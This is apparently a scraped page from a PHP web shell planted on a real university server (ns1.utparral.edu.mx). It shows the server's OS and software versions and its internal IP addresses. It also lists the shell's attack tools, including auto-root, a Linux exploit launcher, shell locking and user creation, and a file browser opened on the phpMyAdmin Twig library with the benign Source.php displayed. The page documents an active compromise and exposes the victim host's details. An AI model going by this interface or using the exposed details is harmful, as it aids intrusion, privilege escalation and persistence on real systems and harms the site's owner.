Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
vendor /
twig /
twig /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Extension
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Node
[ DIR ]
drwxr-xr-x
NodeVisitor
[ DIR ]
drwxr-xr-x
Profiler
[ DIR ]
drwxr-xr-x
RuntimeLoader
[ DIR ]
drwxr-xr-x
Sandbox
[ DIR ]
drwxr-xr-x
TokenParser
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
Compiler.php
4.94
KB
-rw-r--r--
Environment.php
24.33
KB
-rw-r--r--
ExpressionParser.php
32.31
KB
-rw-r--r--
ExtensionSet.php
13.07
KB
-rw-r--r--
FileExtensionEscapingStrategy.php
1.41
KB
-rw-r--r--
Lexer.php
19
KB
-rw-r--r--
Markup.php
939
B
-rw-r--r--
NodeTraverser.php
1.78
KB
-rw-r--r--
Parser.php
11
KB
-rw-r--r--
Source.php
1023
B
-rw-r--r--
Template.php
12.52
KB
-rw-r--r--
TemplateWrapper.php
2.63
KB
-rw-r--r--
Token.php
5.17
KB
-rw-r--r--
TokenStream.php
3.45
KB
-rw-r--r--
TwigFilter.php
3.05
KB
-rw-r--r--
TwigFunction.php
2.79
KB
-rw-r--r--
TwigTest.php
2.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Source.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig; /** * Holds information about a non-compiled Twig template. * * @author Fabien Potencier <fabien@symfony.com> */ final class Source { private $code; private $name; private $path; /** * @param string $code The template source code * @param string $name The template logical name * @param string $path The filesystem path of the template if any */ public function __construct(string $code, string $name, string $path = '') { $this->code = $code; $this->name = $name; $this->path = $path; } public function getCode(): string { return $this->code; } public function getName(): string { return $this->name; } public function getPath(): string { return $this->path; } }
Close